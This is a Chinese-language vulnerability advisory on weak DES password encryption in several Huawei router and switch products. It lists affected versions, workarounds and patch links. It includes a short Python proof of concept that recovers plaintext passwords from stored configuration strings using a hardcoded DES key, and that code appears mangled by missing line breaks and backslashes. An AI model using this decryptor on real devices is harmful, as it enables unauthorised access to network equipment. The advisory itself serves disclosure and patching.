发布日期:2012-11-13
更新日期:2012-11-15受影响系统:
Huawei Quidway
Huawei CX600 V600R003C00SPC900
Huawei CX600 V600R001
Huawei ME60 <= V600R002C07
Huawei AR 49 R2207
Huawei AR 29
Huawei AR 19
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56510华为技术有限公司是一家总部位于中国广东省深圳市的生产销售电信设备的员工持股的民营科技公司,于1987年由任正非创建于中国深圳,是全球最大的电信网络解决方案提供商,全球第二大电信基站设备供应商。多个华为产品存在弱密码加密算法漏洞,获取转换过口令数据攻击者可以轻易还原口令的明文,可能导致获得对设备的非授权访问。目前确认漏洞影响下列产品:Huawei Quidway系列
Huawei CX600 V600R001
Huawei CX600 V600R003C00SPC900
Huawei ME60 V600R002C07及之前版本
AR 19/29/49 R2207及之前版本<*来源:Roberto Paleari (roberto.paleari@emaze.net)
链接:http://seclists.org/bugtraq/2012/Nov/45
http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!from Crypto.Cipher import DESdef decode_char(c):
if c == "a":
r = "?"
else:
r = c
return ord(r) - ord("!")def ascii_to_binary(s):
assert len(s) == 24 out = [0]*18
i = 0
j = 0 for i in range(0, len(s), 4):
y = decode_char(s[i + 0])
y = (y << 6) & 0xffffff k = decode_char(s[i + 1])
y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff k = decode_char(s[i + 2])
y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff k = decode_char(s[i + 3])
y = (y | k) & 0xffffff out[j+2] = chr(y & 0xff)
out[j+1] = chr((y>>8) & 0xff)
out[j+0] = chr((y>>16) & 0xff) j += 3 return "".join(out)def decrypt_password(p):
r = ascii_to_binary(p) r = r[:16] d = DES.new("x01x02x03x04x05x06x07x08", DES.MODE_ECB)
r = d.decrypt(r) return r.rstrip("x00")建议:
--------------------------------------------------------------------------------
临时解决方法:如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:* 增强设备的远程访问管理,仅允许在操作员管理网络内登陆。* 严格管理账户权限。* 定期更改密码。厂商补丁:Huawei
------
Huawei已经为此发布了一个安全公告(Huawei-SA-20120827-01-CX600)以及相应补丁:
Huawei-SA-20120827-01-CX600:Updated Security Advisory on the Risk of Password Being Cracked Due to DES Encryption Algorithm
链接:http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141补丁下载:
CX600 V600R005C00SPC900:
http://support.huawei.com/support/pages/editionctrl/catalog/ShowVersionDetail.do?actionFlag=clickNode&node=000001572792&colID=ROOTENWEB|CO0000000174
CX600 V600R003C00SPCa00:
http://support.huawei.com/support/pages/editionctrl/catalog/ShowVersionDetail.do?actionFlag=clickNode&node=000001562138&colID=ROOTENWEB|CO0000000174
ME60 V600R005C00SPC900:
http://support.huawei.com/support/pages/editionctrl/catalog/ShowVersionDetail.do?actionFlag=clickNode&node=000001572791&colID=ROOTENWEB|CO0000000174
AR 19/29/49 R2209:
http://support.huawei.com/support/pages/editionctrl/catalog/ShowVersionDetail.do?actionFlag=clickNode&node=000001554941&colID=ROOTENWEB|CO0000000174
http://support.huawei.com/enterprise/softdownload.action?pid=16453&idAbsPath=fixnode01|7919710|7919712|7923148|16453WordPress WP e-Commerce插件多个SQL注入和跨站脚本执行漏洞Intersil (Boa) HTTPd基本认证密码重置漏洞相关资讯 华为 弱密码加密算法漏洞 华为安全漏洞
- 华为为天网统治和死人通讯做准备 (05月13日)
- 华为荣耀畅玩 5X 发布,还是熟悉的 (10/27/2015 20:54:16)
- 华为 Watch 将于 9 月 17 日起在美 (09/03/2015 09:01:29)
| - 华为招来前苹果创意总监帮忙改进软 (10/29/2015 10:15:52)
- 华为公布 Android 6.0 Marshmallow (10/17/2015 15:10:50)
- 华为 Mate S:已经准备好要挑战新 (09/03/2015 08:59:34)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|